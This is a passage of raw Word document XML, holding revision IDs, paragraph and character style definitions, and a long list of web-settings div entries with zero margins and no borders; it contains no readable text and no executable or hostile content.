    <w:rsid w:val="00FE275B"/>
    <w:rsid w:val="00FF3DB4"/>
    <w:rsid w:val="00FF42A0"/>
    <w:rsid w:val="00FF6A8D"/>
    <w:rsid w:val="00FF7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0C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD0F4000-9F40-429C-9BC2-BB7BE132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30B"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0034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DE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00346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DE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0034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DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00372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5183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66155687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="84351935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="113333150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="219677839">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="225773250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="255334294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="298725559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="323627271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342245319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="430781077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="436802452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="446391954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509413221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633870619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="791288335">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921795728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962350198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="978268902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123891222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1249465896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1266109992">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1302274257">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1307204444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1323658101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1382747297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1401176623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1426414117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1454519065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1472863769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1481920777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493372993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1542010383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548449301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565290438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645311461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655986748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1667316412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1814713138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1842307407">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849327333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1870290005">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911769533">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930655687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960603974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964994371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1980837477">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2005277599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
